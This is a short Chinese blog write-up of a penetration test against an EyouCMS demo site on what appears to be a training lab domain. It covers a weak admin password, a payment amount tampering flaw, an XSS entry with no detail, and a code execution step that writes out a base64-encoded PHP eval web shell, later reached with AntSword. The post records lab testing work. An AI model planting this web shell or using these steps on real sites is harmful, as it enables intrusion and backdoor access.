易优demo网站测试结果

发布时间:2024年01月21日

易优demo网站测试结果-06

1、信息收集

网站账号:admin 密码:Aa123456

2、存在的漏洞

2.1 后台弱口令漏洞

http://eyoucms-s347fqn.gxalabs.com/login.php?s=Admin/login

在这里插入图片描述

网站账号:admin 密码:Aa123456

成功登陆

在这里插入图片描述

2.2 代码远程执行漏洞

漏洞链接
http://xxxx.com/login.php

在这里插入图片描述

点击进入之后是这个样子

在这里插入图片描述

选择pc文件下的index文件

在这里插入图片描述

输入一句话代码

<?php file_put_contents("./uploads/shell.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="));?>

点击确认提交

然后返回首页,访问upload/shell.php 文件

在这里插入图片描述

代码执行成功

连接蚁剑,成功连接

在这里插入图片描述

2.3 支付漏洞

漏洞链接
http://eyoucms-s347fqn.gxalabs.com/?m=home&c=View&a=index&aid=100

点击立即购买

在这里插入图片描述

抓包修改数量为2

在这里插入图片描述

点击提交订单

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

然后就会发现,金额不对

原价5499*2=10998

在这里插入图片描述

2.6 xss漏洞

漏洞点基本信息

http://eyoucms.gxalabs.com/login.php

在这里插入图片描述

在这里插入图片描述

文章来源:https://blog.csdn.net/weixin_59047731/article/details/135722702
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。